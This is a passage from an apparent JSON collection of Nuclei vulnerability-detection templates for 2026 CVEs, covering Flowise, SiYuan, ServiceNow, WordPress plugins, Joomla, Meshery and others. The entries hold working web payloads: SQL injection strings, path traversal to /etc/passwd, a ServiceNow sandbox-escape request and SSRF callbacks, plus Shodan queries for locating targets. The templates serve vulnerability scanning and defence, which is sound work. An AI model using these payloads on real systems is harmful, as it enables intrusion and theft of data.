200'\n          - 'contains(body, \"loaders\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: storeid\n        part: body\n        group: 1\n        regex:\n          - '\"id\":\"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/document-store/loader/save HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        x-request-from: internal\n\n        {\"storeId\":\"{{storeid}}\",\"loaderId\":\"fileLoader\",\"loaderName\":\"poc\",\"splitterId\":\"\",\"loaderConfig\":{\"file\":\"data:application/javascript;base64,{{base64(payload)}},filename:{{fname}}.js\",\"usage\":\"perPage\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: loaderid\n        part: body\n        group: 1\n        regex:\n          - '\"id\":\"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/document-store/loader/process/{{loaderid}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        x-request-from: internal\n\n        {\"id\":\"{{loaderid}}\",\"storeId\":\"{{storeid}}\",\"loaderId\":\"fileLoader\",\"loaderName\":\"poc\",\"splitterId\":\"\",\"loaderConfig\":{\"file\":\"data:application/javascript;base64,{{base64(payload)}},filename:{{fname}}.js\",\"usage\":\"perPage\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/document-store/vectorstore/insert HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        x-request-from: internal\n\n        {\"storeId\":\"{{storeid}}\",\"recordManagerName\":\"SQLiteRecordManager\",\"recordManagerConfig\":{\"tableName\":\"poc\",\"cleanup\":\"none\",\"sourceIdKey\":\"source\",\"additionalConfig\":\"{\\\"entities\\\":[\\\"/root/.flowise/storage/**/{{fname}}.js\\\",\\\"/home/node/.flowise/storage/**/{{fname}}.js\\\",\\\"/app/.flowise/storage/**/{{fname}}.js\\\",\\\"/data/.flowise/storage/**/{{fname}}.js\\\"]}\"},\"embeddingName\":\"openAIEmbeddings\",\"embeddingConfig\":{\"modelName\":\"text-embedding-ada-002\"},\"vectorStoreName\":\"weaviate\",\"vectorStoreConfig\":{\"weaviateScheme\":\"http\",\"weaviateHost\":\"127.0.0.1:8080\",\"weaviateIndex\":\"Poc\",\"weaviateTextKey\":\"text\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - regex('root:.*:0:0:', body)\n          - '!contains(body, \"Disallowed TypeORM DataSource option\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - 'Error: (root:.*?)\",\\\"stack'\n# digest: 4b0a00483046022100c9e85cd9e19d12205bcc38202428fc55c9faeb6e777792da8e7dcfac54b4337d022100d1529002a59d64323f3b75bee12c0118d22b7a45f3e95ca3a3371bb5f43ac22b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-69251.yaml","vuln_id":"cve-2026-69251"},{"raw":"id: CVE-2026-69085\n\ninfo:\n  name: SiYuan <=3.7.2 - SQL Injection\n  author: str4k3r\n  severity: critical\n  description: |\n    SiYuan before v3.7.3 contains a SQL injection caused by direct concatenation of the keyword parameter in /api/filetree/searchDocs endpoint, letting attackers with publish RoleReader token or unauthenticated in publish mode read and modify database content.\n  impact: |\n    Attackers can read and modify database content across all cleartext notebooks, potentially compromising data integrity and confidentiality.\n  remediation: |\n    Update to version 3.7.3 or later.\n  reference:\n    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-33jq-p8c2-q3q4\n    - https://github.com/siyuan-note/siyuan/releases/tag/v3.7.3\n    - https://hub.docker.com/r/b3log/siyuan/tags\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-69085\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n    cvss-score: 10\n    cve-id: CVE-2026-69085\n    epss-score: 0.00875\n    epss-percentile: 0.57444\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: b3log\n    product: siyuan\n    shodan-query: http.favicon.hash:-1450125239\n  tags: cve,cve2026,siyuan,sqli,sqlite,unauth\n\nhttp:\n  - raw:\n      - |\n        POST /api/notebook/lsNotebooks HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n      - |\n        POST /api/filetree/searchDocs HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"k\":\"poc%')/**/union/**/select/**/'poc','','poc','','{{box_id}}',sqlite_version(),'/POC','POC','','','','','','',0,'d','','',0,'','',0--\"}\n\n    extractors:\n      - type: regex\n        name: box_id\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - '\"id\":\"([0-9]{14}-[a-z0-9]{7})\"[^}]*\"closed\":false'\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: regex\n        part: body\n        regex:\n          - '\"path\":\"[0-9]+\\.[0-9]+\\.[0-9]+\"'\n# digest: 4a0a0047304502202a05a9750866b0871734cb0c95dae7cced230e4b8a5f9f97b38157eadfea993d022100ef203f25def3fb87eadd125bdcad55d7e6a80720d478f0c48565ed34337bfb72:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-69085.yaml","vuln_id":"cve-2026-69085"},{"raw":"id: CVE-2026-69084\n\ninfo:\n  name: SiYuan - SQL Execution\n  author: Boreas37\n  severity: critical\n  description: |\n    SiYuan <= v3.7.2 contains a SQL injection caused by passing client-supplied SQL statements verbatim to the main read-write database handle in /api/search/searchEmbedBlock, letting attackers with publish RoleReader token or anonymous access read and modify content, exploit requires publish RoleReader token or disabled publish authentication.\n  impact: |\n    Attackers can read and modify content across all opened cleartext notebooks, potentially compromising data integrity and confidentiality.\n  remediation: |\n    Update to version v3.7.3 or later.\n  reference:\n    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-vh22-h7hf-www7\n    - https://www.vulncheck.com/advisories/siyuan-before-sql-injection-via-searchembedblock\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-69084\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n    cvss-score: 10\n    cve-id: CVE-2026-69084\n    epss-score: 0.01104\n    epss-percentile: 0.64313\n    cwe-id: CWE-89\n  metadata:\n    max-request: 2\n    verified: true\n    shodan-query: 'title:\"SiYuan\"'\n  tags: cve,cve2026,siyuan,sqli,authenticated\n\nvariables:\n  auth_code: \"{{password}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/system/loginAuth HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"authCode\":\"{{auth_code}}\"}\n\n      - |\n        POST /api/search/searchEmbedBlock HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"embedBlockID\":\"20210808180117-6v0mkxr\",\"stmt\":\"SELECT 1; SELECT 2\",\"excludeIDs\":[],\"headingMode\":0,\"breadcrumb\":false}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"code\":0'\n\n      - type: word\n        part: body\n        words:\n          - 'SQL statement is not single'\n        negative: true\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502210094c43b732eafa15405f6ae3a216cbdbaf325e052989efe65095f6c307c1d70ab02205955bcce93021b41ea0f5bfa322980ead377a538fe6ba6752836e0b43402692e:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-69084.yaml","vuln_id":"cve-2026-69084"},{"raw":"id: CVE-2026-6875\n\ninfo:\n  name: ServiceNow AI Platform - Pre-Auth JavaScript Sandbox Escape RCE\n  author: pdteam,DhiyaneshDk\n  severity: critical\n  description: |\n    ServiceNow AI Platform (Brazil, Australia, Zurich, and Yokohama releases before patching) contains a pre-authentication remote code execution vulnerability. The /assessment_thanks.do endpoint passes the sysparm_assessable_type parameter into GlideRecord's addQuery(), which evaluates \"javascript:\" prefixed values as JavaScript in a restricted script sandbox. A sandbox escape gadget using Object.defineProperty and Class.create.constructor chains through the gs.include('ItemViewElementsProvider') path to invoke Function(code)(), bypassing the sandbox and executing arbitrary GlideController code. Actively exploited in the wild since July 2026.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code within the ServiceNow platform, access all database tables, create administrator accounts, and execute shell commands on connected MID proxy servers that sit within corporate internal networks.\n  remediation: Apply the latest security updates or upgrade to the patched release provided by ServiceNow.\n  reference:\n    - https://slcyber.io/research-center/smashing-the-servicenow-sandbox-pre-authentication-rce/\n    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB3137947\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-6875\n    - https://www.bleepingcomputer.com/news/security/critical-servicenow-code-execution-flaw-now-exploited-in-attacks/\n    - https://github.com/tc4dy/CVE-2026-6875-PoC-Exploit\n  classification:\n    cve-id: CVE-2026-6875\n    cwe-id: CWE-94\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 9.5\n    epss-score: 0.77584\n    epss-percentile: 0.99539\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: servicenow\n    product: servicenow\n    shodan-query:\n      - http.favicon.hash:\"1701804003\"\n      - http.title:\"servicenow\"\n    fofa-query:\n      - icon_hash=1701804003\n      - title=\"servicenow\"\n    google-query: intitle:\"servicenow\"\n  tags: cve,cve2026,servicenow,rce,sandbox-escape,js-injection,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/login.do\"\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"servicenow\"\n          - \"glide\"\n          - \"sysparm\"\n        condition: or\n        case-insensitive: true\n        internal: true\n\n  - raw:\n      - |\n        GET /assessment_thanks.do?sysparm_assessable_type=javascript%3AObject.defineProperty(Object%2C%27clone%27%2C%7Bvalue%3AClass.create.constructor%7D)%3BObject.defineProperty(AbstractAjaxProcessor%2C%27prototype%27%2C%7Bvalue%3A%22GlideController().evaluateAsObject(%27gs.addInfoMessage(999*999)%27)%22%7D)%3Bgs.include(%27ItemViewElementsProvider%27)%3BItemViewElementsProvider.prototype() HTTP/1.1\n        Host: {{Hostname}}\n\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"998001\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502210098451b0274f80cc6a9a9e1cce8f31ff2d4d4d77a0ee9adbf79e33640be8cce3902204f1f75eb8f1d838faf5f6ac911da296acdbd6512418aea82ae066a2232d31d8e:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-6875.yaml","vuln_id":"cve-2026-6875"},{"raw":"id: CVE-2026-6854\n\ninfo:\n  name: My Calendar < 3.7.9 - Unauthenticated SQL Injection\n  author: Pauullamm\n  severity: high\n  description: |\n    The My Calendar – Accessible Event Manager plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'mc_auth' parameter in all versions up to, and including, 3.7.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n  impact: |\n    Unauthenticated attackers can extract sensitive database information, leading to data disclosure.\n  remediation: |\n    Update to the latest version of the My Calendar – Accessible Event Manager plugin.\n  reference:\n    - https://wpscan.com/vulnerability/a6466f97-4d8a-4d01-b61f-94d89da7c16b/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-6854\n  classification:\n    cve-id: CVE-2026-6854\n    epss-score: 0.01577\n    epss-percentile: 0.74388\n    cwe-id: CWE-89\n  metadata:\n    max-request: 3\n    verified: true\n  tags: cve,cve2026,sqli,wordpress,my-calendar\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"My Calendar\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: my_calendar_version\n        part: body\n        group: 1\n        regex:\n          - \"(?mi)^Stable tag:\\\\s*([0-9]+\\\\.[0-9]+\\\\.[0-9]+)\"\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?to=2026-09-12&from=2026-08-13&mc-api=json\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code >= 200\"\n          - \"contains(tolower(header), 'application/json')\"\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?to=2026-09-12&from=2026-08-13&mc-api=json&mc_auth=1%2C2)%20OR%20SLEEP%287%29--%20x\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"duration >= 7\"\n# digest: 4a0a0047304502205a4d987ded2c984c0e613167c2351bc7e7a198d731e439c5d57b300b1322a87302210085c2390c08edae4f918a700ce3bb989b9985ba8dd90ef21550dc5a1b5262b319:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-6854.yaml","vuln_id":"cve-2026-6854"},{"raw":"id: CVE-2026-6826\n\ninfo:\n  name: Concrete CMS <9.5.1 - Unauthenticated File Usage Disclosure\n  author: str4k3r\n  severity: medium\n  description: |\n    Concrete CMS 9.5.0 and below  is vulnerable to unauthenticated file usage disclosure via missing permission check in the usage controller.\n  impact: |\n    Any unauthenticated visitor can request /ccm/system/dialogs/file/usage/{fID} with any file ID and receive a list of every page that references that file, including page IDs, handles, and full URLs. This includes pages that are otherwise restricted by permissions.\n  remediation: |\n    Update to the latest version beyond 9.5.0.\n  reference:\n    - https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes\n    - https://www.concretecms.org/security\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-6826\n    - https://vulnerability.circl.lu/vuln/cve-2026-6826\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N\n    cvss-score: 6.9\n    cve-id: CVE-2026-6826\n    epss-score: 0.01461\n    epss-percentile: 0.72439\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.component:\"Concrete CMS\"\n    fofa-query: app=\"Concrete-CMS\"\n  tags: cve,cve2026,concretecms,concrete,disclosure,unauth,idor\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/ccm/system/dialogs/file/usage/1\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'ccm-ui'\n          - 'Page ID'\n          - 'Handle'\n          - 'Location'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100cf74bd9f71fc499eff16efe42f66b94d9bd0d636b35a5b42846ac0548fd2b986022061dcb8ab4ed4511fe7d2bc44b4f42a19dab21659141919988f77ca4a176e922f:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-6826.yaml","vuln_id":"cve-2026-6826"},{"raw":"id: CVE-2026-67208\n\ninfo:\n  name: Juggle <= 1.6.0 - Unauthenticated Exposed H2 Database Console\n  author: str4k3r\n  severity: critical\n  description: |\n    Juggle ships the H2 database web console enabled and reachable from\n    non-localhost by default. No application-level authentication covers\n    the /h2-console path, and the shipped default datasource credentials\n    (sa/juggle) are known. An unauthenticated remote attacker can reach the\n    console and, using the default credentials, achieve OS command\n    execution on the host via the H2 CREATE ALIAS Runtime.exec() technique.\n  impact: |\n    Unauthenticated remote attackers can execute arbitrary OS commands with root privileges, leading to full system compromise.\n  remediation: |\n    Update to the latest version and change default credentials; restrict access to /h2-console.\n  reference:\n    - https://github.com/somta/Juggle/issues/86\n    - https://www.vulncheck.com/advisories/juggle-unauthenticated-rce-via-exposed-h2-console\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-67208\n    epss-score: 0.05285\n    epss-percentile: 0.92204\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 2\n    product: juggle\n    vendor: somta\n  tags: cve,cve2026,juggle,h2,exposure,unauth,rce\n\nflow: |\n  http(\"juggle-detect\") && http(\"h2-console-check\")\n\nhttp:\n  - method: GET\n    id: juggle-detect\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"<title>Juggle</title>\")'\n        condition: and\n        internal: true\n\n  - method: GET\n    id: h2-console-check\n    path:\n      - \"{{BaseURL}}/h2-console/\"\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n      - type: word\n        part: body\n        words:\n          - \"<title>H2 Console</title>\"\n          - \"login.jsp?jsessionid=\"\n        condition: and\n# digest: 490a00463044022023098bac5c74ed3e9f26b71befafd04e2d440efc5d72f3bd89ac200943e84f3602204cb157b96251cde3c795c539d1bec5c427c5dfddfdd2fcf8d3cf9d4368e7cccd:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-67208.yaml","vuln_id":"cve-2026-67208"},{"raw":"id: CVE-2026-6639\n\ninfo:\n  name: AI Copilot Content Generator <=1.4.6 - Unauthenticated Task Data Exposure\n  author: str4k3r\n  severity: high\n  description: |\n    AIWU AI Chatbot & Workflow Automation WordPress plugin <= 1.4.6 contains a sensitive information exposure caused by unauthenticated access to getCurrentTaskResults() method, letting unauthenticated attackers retrieve API keys and configuration data, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can access sensitive API keys and configuration data, risking data leakage and unauthorized use of services.\n  remediation: |\n    Update to the latest version beyond 1.4.6.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-6639\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/247b1921-70a6-4e65-819a-2895bc395e9f?source=cve\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-6639\n    epss-score: 0.00367\n    epss-percentile: 0.30599\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: aiwu\n    product: ai-copilot-content-generator\n    fofa-query: 'body=\"/wp-content/plugins/ai-copilot-content-generator/\"'\n  tags: cve,cve2026,wordpress,wp-plugin,aiwu,ai-copilot,exposure,unauth\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=getCurrentTaskResults&pl=waic&mod=workspace&reqType=ajax&task_id=1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"feature\\\":\\\"magictext\\\"\")'\n        condition: and\n# digest: 4b0a004830460221009b5a86cf5ba6184fdeae9ea140d0fbe22532fbd48d0b5335750b8213b2017ae8022100fbaecd63e05854635dae058209f7cc08b0bd9b0426c7174ae57dc980729c5cd0:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-6639.yaml","vuln_id":"cve-2026-6639"},{"raw":"id: CVE-2026-65919\n\ninfo:\n  name: Meshery <1.0.57 - Arbitrary File Read\n  author: str4k3r\n  severity: high\n  description: |\n    Meshery before 1.0.57 contains an unauthenticated arbitrary file read vulnerability in the /api/system/fileView and /api/system/fileDownload endpoints that pass user-supplied file parameters directly to os.Open without path validation. Attackers can supply absolute paths or traversal sequences in the file parameter to read arbitrary files from the host filesystem without authentication.\n  impact: |\n    Unauthenticated attackers can read arbitrary files on the host, potentially exposing sensitive information.\n  remediation: |\n    Upgrade to version 1.0.57 or later.\n  reference:\n    - https://github.com/meshery/meshery/issues/20076\n    - https://github.com/meshery/meshery/pull/20133\n    - https://github.com/meshery/meshery/commit/ea83a26cb090b13be36c07cf24a99f8c637cc765\n    - https://www.vulncheck.com/advisories/meshery-unauthenticated-arbitrary-file-read-via-fileview-and-filedownload\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-65919\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-65919\n    epss-score: 0.02087\n    epss-percentile: 0.80758\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 3\n    product: meshery\n    vendor: meshery\n    fofa-query: title=\"Meshery\"\n    shodan-query: http.title:\"Meshery\"\n  tags: cve,cve2026,meshery,lfi,traversal,oss\n\nflow: http(\"detect\") && http(\"exploit\")\n\nhttp:\n  - id: detect\n    method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Meshery\"\n          - \"assetPrefix\"\n        condition: and\n        internal: true\n        case-insensitive: true\n\n  - id: exploit\n    method: GET\n    path:\n      - \"{{BaseURL}}/api/system/fileView?file=/etc/passwd\"\n      - \"{{BaseURL}}/api/system/fileDownload?file=/etc/passwd\"\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022071ecb2d8521e1d8be8df165c8276e0e56bb965161eb8d025997ebc6abc4c3ffe02203564a0240c14748d3b7bdf29e6bc95f5a78ead08a5f5d499bc2b9baed1a5a900:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-65919.yaml","vuln_id":"cve-2026-65919"},{"raw":"id: CVE-2026-65761\n\ninfo:\n  name: Joomla Easy Store - SQL Injection\n  author: YesWeHack\n  severity: critical\n  description: |\n    Joomla Easy Store extension 1.0.0-2.0.1 contains an unauthenticated SQL injection caused by improper validation of order parameters, letting unauthenticated attackers read the full database including credentials and sessions.\n  impact: |\n    Unauthenticated attackers can read the entire database, exposing sensitive data including credentials and session information.\n  remediation: |\n    Update to the latest version of Easy Store extension.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-65761\n    - https://mysites.guru/blog/easystore-security-disclosure/\n    - https://www.joomshaper.com/easystore\n  classification:\n    cve-id: CVE-2026-65761\n    epss-score: 0.00928\n    epss-percentile: 0.5901\n    cwe-id: CWE-89\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cpe: cpe:2.3:a:joomshaper.com:easy_store_extension_for_joomla:*:*:*:*:*:*:*:*\n  metadata:\n    max-requests: 1\n    vendor: JoomShaper\n    product: Easy Store\n    fofa-query: app=\"joomla\" && body=\"Easy Store\"\n  tags: cve,cve2026,joomla,easystore,sql-injection,unauthenticated\n\nvariables:\n  num: \"999999999\"\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/index.php?option=com_easystore&view=products&task=search&filter_sortby=created-ASC,EXTRACTVALUE(1,CONCAT(CHAR(126),SUBSTRING(MD5({{num}}),1,28)))--+-\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 500'\n          - 'contains_all(body, substr(md5(num), 0, 28), \"XPATH syntax error\")'\n        condition: and\n# digest: 4a0a0047304502210095c6e44086066185be59920175d83e383ecd2da9382c5634fcf5d20f4a32399d022024312865c049ec625a5029edc21835771c8008dd4eb6b27dbefd11360af5edb5:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-65761.yaml","vuln_id":"cve-2026-65761"},{"raw":"id: CVE-2026-65694\n\ninfo:\n  name: Microweber CMS <= 2.0.20 - Unauthenticated Arbitrary File Read\n  author: 0x_Akoko,abdugafforov-bobur\n  severity: high\n  description: |\n    Microweber CMS <= 2.0.20 contains a path traversal vulnerability caused by failure to normalize path query parameter in static file controller, letting unauthenticated remote attackers read arbitrary files.\n  impact: |\n    Unauthenticated attackers can read sensitive files, potentially exposing credentials and system information.\n  remediation: |\n    Update to the latest version beyond 2.0.20.\n  reference:\n    - https://github.com/abdugafforov-bobur/CVE-2026-65694-PoC\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-65694\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-65694\n    epss-score: 0.03394\n    epss-percentile: 0.88289\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: microweber\n    product: microweber\n    shodan-query: http.html:\"microweber\"\n    fofa-query: body=\"microweber\"\n  tags: cve,cve2026,microweber,lfi\n\nhttp:\n  - raw:\n      - |\n        GET /userfiles/x?path=../../../../../../../../etc/passwd HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"root:x:0:0\")'\n        condition: and\n# digest: 4a0a00473045022100e8b1d18efb89e935224af8e58bf54acfce61e3eb14493b28c737e3302e46d03102205b1770c2d02980fdb9f8632567a61d54281a82c0b7c30113884d41ff23167553:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-65694.yaml","vuln_id":"cve-2026-65694"},{"raw":"id: CVE-2026-65442\n\ninfo:\n  name: FormCraft3 <= 3.9.15 - Server-Side Request Forgery\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Unauthenticated Server Side Request Forgery (SSRF) in FormCraft <= 3.9.15 versions.\n  impact: |\n    An unauthenticated attacker can force the server to make HTTP requests to arbitrary internal or external URLs, potentially accessing cloud metadata services (AWS/GCP/Azure), internal network services, and sensitive data.\n  remediation: |\n    Update FormCraft3 to version 3.9.16 or later which adds nonce verification and authentication checks to the formcraft3_get AJAX endpoint.\n  reference:\n    - https://patchstack.com/database/wordpress/plugin/formcraft/vulnerability/wordpress-formcraft-plugin-3-9-15-server-side-request-forgery-ssrf-vulnerability\n    - https://wpscan.com/vulnerability/a8ce5ff4-dd4c-411c-9b34-7824a75742b6/\n    - https://github.com/advisories/GHSA-xvfc-pj4j-wr9x\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-65442\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-0591\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n    cvss-score: 7.2\n    cve-id: CVE-2026-65442\n    epss-score: 0.00419\n    epss-percentile: 0.35894\n    cwe-id: CWE-918\n    cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: subtlewebinc\n    product: formcraft3\n    framework: wordpress\n    fofa-query: body=\"formcraft3\" && body=\"wp-\"\n    shodan-query: http.component:\"wordpress\" http.html:\"formcraft3\"\n  tags: cve,cve2026,wp,wp-plugin,wordpress,formcraft3,ssrf,subtlewebinc,vkev,oast\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: word\n        words:\n          - \"/wp-content/plugins/formcraft3/\"\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"User-Agent: WordPress\"\n# digest: 490a00463044022056e109d67f84045136196ec89f96529d2aca321752ff9e98a614467f364471dc02201c323a468c5398da079ac9fcc8bafd55ffc1d3c7672e017d28d50ad9ca94c1ac:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-65442.yaml","vuln_id":"cve-2026-65442"},{"raw":"id: CVE-2026-64849\n\ninfo:\n  name: MLflow Webhook SSRF - Unauthenticated Full-Read via Redirect Bypass\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    MLflow > 3.15.0 contains an information disclosure vulnerability caused by improper validation of webhook URLs allowing attackers to reach internal or cloud metadata services and obtain response details, exploit requires unauthenticated access to the webhook test endpoint.\n  impact: |\n    Attackers can access internal or cloud metadata services and retrieve response status and body, potentially exposing sensitive information.\n  remediation: |\n    Upgrade MLflow to a version containing PR #24258 which adds SSRFProtectedHTTPAdapter for connection-time IP validation covering redirect targets and DNS rebinding.\n  reference:\n    - https://github.com/mlflow/mlflow/security/advisories/GHSA-7gwp-5pfp-969j\n    - https://github.com/mlflow/mlflow/pull/24258\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N\n    cvss-score: 9.3\n    cve-id: CVE-2026-64849\n    epss-score: 0.1641\n    epss-percentile: 0.96834\n    cwe-id: CWE-918\n  metadata:\n    max-request: 3\n    verified: true\n    shodan-query: http.title:\"MLflow\"\n    fofa-query: title=\"MLflow\"\n  tags: cve,cve2026,mlflow,ssrf,oast,webhook,oss,vkev,kev\n\nvariables:\n  random: \"{{rand_text_alpha(8)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/2.0/mlflow/webhooks 